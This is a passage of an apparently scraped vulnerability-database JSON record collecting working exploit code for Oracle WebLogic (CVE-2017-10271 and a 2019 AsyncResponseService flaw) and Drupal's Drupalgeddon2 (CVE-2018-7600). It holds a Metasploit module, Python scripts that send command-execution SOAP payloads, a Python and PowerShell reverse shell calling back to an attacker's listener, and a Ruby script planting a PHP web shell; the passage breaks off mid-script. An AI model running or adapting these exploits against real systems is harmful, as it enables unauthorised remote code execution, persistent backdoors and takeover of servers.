'PAYLOAD' => 'cmd/unix/reverse_perl' },\n 'Payload' => {\n 'Space' => 2048,\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl telnet'\n }\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'WfsDelay' => 12\n },\n 'DisclosureDate' => '2019-04-23',\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(7001),\n OptString.new('TARGETURI', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])\n ]\n )\n end\n\n def check\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'headers' => { 'SOAPAction' => '' }\n )\n\n if res && res.code == 500 && res.body.include?('<faultcode>env:Client</faultcode>')\n vprint_status(\"The target returned a vulnerable HTTP code: /#{res.code}\")\n vprint_status(\"The target returned a vulnerable HTTP error: /#{res.body.split(\"\\n\")[0]}\")\n Exploit::CheckCode::Vulnerable\n elsif res && res.code != 202\n vprint_status('The target returned a non-vulnerable HTTP code')\n Exploit::CheckCode::Safe\n elsif res.nil?\n vprint_status('The target did not respond in an expected way')\n Exploit::CheckCode::Unknown\n else\n vprint_status(\"The target returned HTTP code: #{res.code}\")\n vprint_status(\"The target returned HTTP body: #{res.body.split(\"\\n\")[0]} [...]\")\n Exploit::CheckCode::Unknown\n end\n end\n\n def exploit\n print_status('Generating payload...')\n case target.name\n when 'Windows'\n string0_cmd = 'cmd.exe'\n string1_param = '/c'\n shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true, encoded: false })\n when 'Unix', 'Solaris'\n string0_cmd = '/bin/bash'\n string1_param = '-c'\n shell_payload = payload.encoded\n end\n\n random_action = rand_text_alphanumeric(20)\n random_relates = rand_text_alphanumeric(20)\n\n soap_payload = %(<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\")\n soap_payload << %(xmlns:wsa=\"http://www.w3.org/2005/08/addressing\")\n soap_payload << %(xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">)\n soap_payload << %(<soapenv:Header>)\n soap_payload << %(<wsa:Action>#{random_action}</wsa:Action>)\n soap_payload << %(<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>)\n soap_payload << %(<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">)\n soap_payload << %(<void class=\"java.lang.ProcessBuilder\">)\n soap_payload << %(<array class=\"java.lang.String\" length=\"3\">)\n soap_payload << %(<void index=\"0\">)\n soap_payload << %(<string>#{string0_cmd}</string>)\n soap_payload << %(</void>)\n soap_payload << %(<void index=\"1\">)\n soap_payload << %(<string>#{string1_param}</string>)\n soap_payload << %(</void>)\n soap_payload << %(<void index=\"2\">)\n soap_payload << %(<string>#{shell_payload.encode(xml: :text)}</string>)\n # soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>|\n soap_payload << %(</void>)\n soap_payload << %(</array>)\n soap_payload << %(<void method=\"start\"/>)\n soap_payload << %(</void>)\n soap_payload << %(</work:WorkContext>)\n soap_payload << %(</soapenv:Header>)\n soap_payload << %(<soapenv:Body>)\n soap_payload << %(<asy:onAsyncDelivery/>)\n soap_payload << %(</soapenv:Body>)\n soap_payload << %(</soapenv:Envelope>)\n\n print_status('Sending payload...')\n\n begin\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'data' => soap_payload,\n 'headers' => { 'SOAPAction' => '' }\n )\n rescue Errno::ENOTCONN\n fail_with(Failure::Disconnected, 'The target forcibly closed the connection, and is likely not vulnerable.')\n end\n\n if res.nil?\n fail_with(Failure::Unreachable, 'No response from host')\n elsif res && res.code != 202\n fail_with(Failure::UnexpectedReply, \"Exploit failed. Host responded with HTTP code #{res.code} instead of HTTP code 202\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOracle WebLogic Server 10.3.6.0.0 12.x - Remote Command Execution", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-12-26T00:00:00", "title": "Oracle WebLogic Server 10.3.6.0.0 12.x - Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2017-12-26T00:00:00", "id": "EXPLOITPACK:C22F157FABAD412B7D508C7EEC750856", "href": "", "sourceData": "import requests\nimport sys\n\nurl_in = sys.argv[1]\npayload_url = url_in + \"/wls-wsat/CoordinatorPortType\"\npayload_header = {'content-type': 'text/xml'}\n\n\ndef payload_command (command_in):\n html_escape_table = {\n \"&\": \"&\",\n '\"': \"\"\",\n \"'\": \"'\",\n \">\": \">\",\n \"<\": \"<\",\n }\n command_filtered = \"<string>\"+\"\".join(html_escape_table.get(c, c) for c in command_in)+\"</string>\"\n payload_1 = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\"> \\n\" \\\n \" <soapenv:Header> \" \\\n \" <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\"> \\n\" \\\n \" <java version=\\\"1.8.0_151\\\" class=\\\"java.beans.XMLDecoder\\\"> \\n\" \\\n \" <void class=\\\"java.lang.ProcessBuilder\\\"> \\n\" \\\n \" <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\" \\\n \" <void index = \\\"0\\\"> \" \\\n \" <string>cmd</string> \" \\\n \" </void> \" \\\n \" <void index = \\\"1\\\"> \" \\\n \" <string>/c</string> \" \\\n \" </void> \" \\\n \" <void index = \\\"2\\\"> \" \\\n + command_filtered + \\\n \" </void> \" \\\n \" </array>\" \\\n \" <void method=\\\"start\\\"/>\" \\\n \" </void>\" \\\n \" </java>\" \\\n \" </work:WorkContext>\" \\\n \" </soapenv:Header>\" \\\n \" <soapenv:Body/>\" \\\n \"</soapenv:Envelope>\"\n return payload_1\n\ndef do_post(command_in):\n result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)\n\n if result.status_code == 500:\n print \"Command Executed \\n\"\n else:\n print \"Something Went Wrong \\n\"\n\n\n\nprint \"***************************************************** \\n\" \\\n \"**************** Coded By 1337g ****************** \\n\" \\\n \"* CVE-2017-10271 Blind Remote Command Execute EXP * \\n\" \\\n \"***************************************************** \\n\"\n\nwhile 1:\n command_in = raw_input(\"Eneter your command here: \")\n if command_in == \"exit\" : exit(0)\n do_post(command_in)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOracle WebLogic 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-03T00:00:00", "title": "Oracle WebLogic 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-03T00:00:00", "id": "EXPLOITPACK:E47A4ABCB334901131160C872A570166", "href": "", "sourceData": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\n# Date Authored: Jan 3, 2018\n# Date Announced: 10/19/2017\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\n# Exploit is based off of POC by Luffin from Github\n# https://github.com/Luffin/CVE-2017-10271\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\n# CVE: CVE-2017-10271\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\n# (Python 3) Example check listener: python3 -m http.server 4444\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\n# (Netcat) Example exploit listener: nc -nlvp 4444\n\nfrom sys import exit\nfrom requests import post\nfrom argparse import ArgumentParser\nfrom random import choice\nfrom string import ascii_uppercase, ascii_lowercase, digits\nfrom xml.sax.saxutils import escape\n\nclass Exploit:\n\n def __init__(self, check, rhost, lhost, lport, windows):\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\n self.lhost = lhost\n self.lport = lport\n self.check = check\n if windows:\n self.target = 'win'\n else:\n self.target = 'unix'\n\n if self.target == 'unix':\n # Unix reverse shell\n # You should also be able to instead use something from MSFVenom. E.g.\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\n self.cmd_payload = (\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\n ).format(lhost=self.lhost, lport=self.lport)\n else:\n # Windows reverse shell\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\n self.cmd_payload = (\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\n )\n self.cmd_payload = escape(self.cmd_payload)\n\n def cmd_base(self):\n if self.target == 'win':\n return 'cmd'\n return '/bin/sh'\n\n def cmd_opt(self):\n if self.target == 'win':\n return '/c'\n return '-c'\n\n\n def get_generic_check_payload(self):\n random_uri = ''.join(\n choice(ascii_uppercase + ascii_lowercase + digits)\n for _ in range(16))\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n <object id=\"url\" class=\"java.net.URL\">\n <string>http://{lhost}:{lport}/{random_uri}</string>\n </object>\n <object idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n'''\n\n return generic_check_payload.format(\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\n\n def get_process_builder_payload(self):\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <object class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>{cmd_base}</string>\n </void>\n <void index=\"1\">\n <string>{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>{cmd_payload}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n'''\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\n cmd_payload=self.cmd_payload)\n\n def print_banner(self):\n print(\"=\" * 80)\n print(\"CVE-2017-10271 RCE Exploit\")\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\n print(\"Shell Listener: {lhost}:{lport}\".format(\n lhost=self.lhost, lport=self.lport))\n print(\"=\" * 80)\n\n def post_exploit(self, data):\n headers = {\n \"Content-Type\":\n \"text/xml;charset=UTF-8\",\n \"User-Agent\":\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\n }\n payload = \"/wls-wsat/CoordinatorPortType\"\n\n vulnurl = self.url + payload\n try:\n req = post(\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\n if self.check:\n print(\"[*] Did you get an HTTP GET request back?\")\n else:\n print(\"[*] Did you get a shell back?\")\n except Exception as e:\n print('[!] Connection Error')\n print(e)\n\n def run(self):\n self.print_banner()\n if self.check:\n print('[+] Generating generic check payload')\n payload = self.get_generic_check_payload()\n else:\n print('[+] Generating execution payload')\n payload = self.get_process_builder_payload()\n print('[*] Generated:')\n print(payload)\n if self.check:\n print('[+] Running generic check payload')\n else:\n print('[+] Running {target} execute payload').format(target=self.target)\n\n self.post_exploit(data=payload)\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(\n description=\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\n )\n parser.add_argument(\n '-l',\n '--lhost',\n required=True,\n dest='lhost',\n nargs='?',\n help='The listening host that the remote server should connect back to')\n parser.add_argument(\n '-p',\n '--lport',\n required=True,\n dest='lport',\n nargs='?',\n help='The listening port that the remote server should connect back to')\n parser.add_argument(\n '-r',\n '--rhost',\n required=True,\n dest='rhost',\n nargs='?',\n help='The remote host base URL that we should send the exploit to')\n parser.add_argument(\n '-c',\n '--check',\n dest='check',\n action='store_true',\n help=\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\n )\n parser.add_argument(\n '-w',\n '--win',\n dest='windows',\n action='store_true',\n help=\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\n )\n\n args = parser.parse_args()\n\n exploit = Exploit(\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\n windows=args.windows)\n exploit.run()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (PoC)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-13T00:00:00", "title": "Drupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "EXPLOITPACK:643750D6FF631053256ACECA930FF041", "href": "", "sourceData": "#!/usr/bin/env\nimport sys\nimport requests\n\nprint ('################################################################')\nprint ('# Proof-Of-Concept for CVE-2018-7600')\nprint ('# by Vitalii Rudnykh')\nprint ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')\nprint ('# https://github.com/a2u/CVE-2018-7600')\nprint ('################################################################')\nprint ('Provided only for educational or information purposes\\n')\n\ntarget = input('Enter target url (example: https://domain.ltd/): ')\n\n# Add proxy support (eg. BURP to analyze HTTP(s) traffic)\n# set verify = False if your proxy certificate is self signed\n# remember to set proxies both for http and https\n# \n# example:\n# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n# verify = False\nproxies = {}\nverify = True\n\nurl = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \npayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo \";-)\" | tee hello.txt'}\n\nr = requests.post(url, proxies=proxies, data=payload, verify=verify)\ncheck = requests.get(target + 'hello.txt')\nif check.status_code != 200:\n sys.exit(\"Not exploitable\")\nprint ('\\nCheck: '+target+'hello.txt')", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (Metasploit)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-17T00:00:00", "title": "Drupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-17T00:00:00", "id": "EXPLOITPACK:E563140BD918794B55F61FC55941120F", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n \n include Msf::Exploit::Remote::HttpClient\n \n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Drupalgeddon2',\n 'Description' => %q{\n CVE-2018-7600 / SA-CORE-2018-002\n Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1\n allows remote attackers to execute arbitrary code because of an issue affecting\n multiple subsystems with default or common module configurations.\n\n The module can load msf PHP arch payloads, using the php/base64 encoder.\n\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Vitalii Rudnykh', # initial PoC\n 'Hans Topo', # further research and ruby port\n 'Jos\u00e9 Ignacio Rojo' # further research and msf module\n ],\n 'References' =>\n [\n ['SA-CORE', '2018-002'],\n ['CVE', '2018-7600'],\n ],\n 'DefaultOptions' =>\n {\n 'encoder' => 'php/base64',\n 'payload' => 'php/meterpreter/reverse_tcp',\n },\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => [ARCH_PHP],\n 'Targets' =>\n [\n ['User register form with exec', {}],\n ],\n 'DisclosureDate' => 'Apr 15 2018',\n 'DefaultTarget' => 0\n ))\n \n register_options(\n [\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\n ])\n \n register_advanced_options(\n [\n\n ])\n end\n \n def uri_path\n normalize_uri(target_uri.path)\n end\n\n def exploit_user_register\n data = Rex::MIME::Message.new\n data.add_part(\"php -r '#{payload.encoded}'\", nil, nil, 'form-data; name=\"mail[#markup]\"')\n data.add_part('markup', nil, nil, 'form-data; name=\"mail[#type]\"')\n data.add_part('user_register_form', nil, nil, 'form-data; name=\"form_id\"')\n data.add_part('1', nil, nil, 'form-data; name=\"_drupal_ajax\"')\n data.add_part('exec', nil, nil, 'form-data; name=\"mail[#post_render][]\"')\n post_data = data.to_s\n\n # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{uri_path}user/register\",\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data,\n 'vars_get' => {\n 'element_parents' => 'account/mail/#value',\n 'ajax_form' => '1',\n '_wrapper_format' => 'drupal_ajax',\n }\n })\n end\n \n ##\n # Main\n ##\n \n def exploit\n case datastore['TARGET']\n when 0\n exploit_user_register\n else\n fail_with(Failure::BadConfig, \"Invalid target selected.\")\n end\n end\n end", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 7.58 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-13T00:00:00", "title": "Drupal 7.58 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "EXPLOITPACK:9E300C1777BC1D8C514DB64FA7D000CE", "href": "", "sourceData": "#!/usr/bin/env ruby\n#\n# [CVE-2018-7600] Drupal <= 8.5.0 / <= 8.4.5 / <= 8.3.8 / 7.23 <= 7.57 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/\n#\n# Authors:\n# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked\n# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k\n#\n\n\nrequire 'base64'\nrequire 'json'\nrequire 'net/http'\nrequire 'openssl'\nrequire 'readline'\nrequire 'highline/import'\n\n\n# Settings - Try to write a PHP to the web root?\ntry_phpshell = true\n# Settings - General/Stealth\n$useragent = \"drupalgeddon2\"\nwebshell = \"shell.php\"\n# Settings - Proxy information (nil to disable)\n$proxy_addr = nil\n$proxy_port = 8080\n\n\n# Settings - Payload (we could just be happy without this PHP shell, by using just the OS shell - but this is 'better'!)\nbashcmd = \"<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }\"\nbashcmd = \"echo \" + Base64.strict_encode64(bashcmd) + \" | base64 -d\"\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Function http_request <url> [type] [data]\ndef http_request(url, type=\"get\", payload=\"\", cookie=\"\")\n puts verbose(\"HTTP - URL : #{url}\") if $verbose\n puts verbose(\"HTTP - Type: #{type}\") if $verbose\n puts verbose(\"HTTP - Data: #{payload}\") if not payload.empty? and $verbose\n\n begin\n uri = URI(url)\n request = type =~ /get/? Net::HTTP::Get.new(uri.request_uri) : Net::HTTP::Post.new(uri.request_uri)\n request.initialize_http_header({\"User-Agent\" => $useragent})\n request.initialize_http_header(\"Cookie\" => cookie) if not cookie.empty?\n request.body = payload if not payload.empty?\n return $http.request(request)\n rescue SocketError\n puts error(\"Network connectivity issue\")\n rescue Errno::ECONNREFUSED => e\n puts error(\"The target is down ~ #{e.message}\")\n puts error(\"Maybe try disabling the proxy (#{$proxy_addr}:#{$proxy_port})...\") if $proxy_addr\n rescue Timeout::Error => e\n puts error(\"The target timed out ~ #{e.message}\")\n end\n\n # If we got here, something went wrong.\n exit\nend\n\n\n# Function gen_evil_url <cmd> [method] [shell] [phpfunction]\ndef gen_evil_url(evil, element=\"\", shell=false, phpfunction=\"passthru\")\n puts info(\"Payload: #{evil}\") if not shell\n puts verbose(\"Element : #{element}\") if not shell and not element.empty? and $verbose\n puts verbose(\"PHP fn : #{phpfunction}\") if not shell and $verbose\n\n # Vulnerable parameters: #access_callback / #lazy_builder / #pre_render / #post_render\n # Check the version to match the payload\n if $drupalverion.start_with?(\"8\") and element == \"mail\"\n # Method #1 - Drupal v8.x: mail, #post_render - HTTP 200\n url = $target + $clean_url + $form + \"?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\n payload = \"form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=\" + phpfunction + \"&mail[a][#type]=markup&mail[a][#markup]=\" + evil\n\n elsif $drupalverion.start_with?(\"8\") and element == \"timezone\"\n # Method #2 - Drupal v8.x: timezone, #lazy_builder - HTTP 500 if phpfunction=exec // HTTP 200 if phpfunction=passthru\n url = $target + $clean_url + $form + \"?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\n payload = \"form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=\" + phpfunction + \"&timezone[a][#lazy_builder][][]=\" + evil\n\n #puts warning(\"WARNING: May benefit to use a PHP web shell\") if not try_phpshell and phpfunction != \"passthru\"\n\n elsif $drupalverion.start_with?(\"7\") 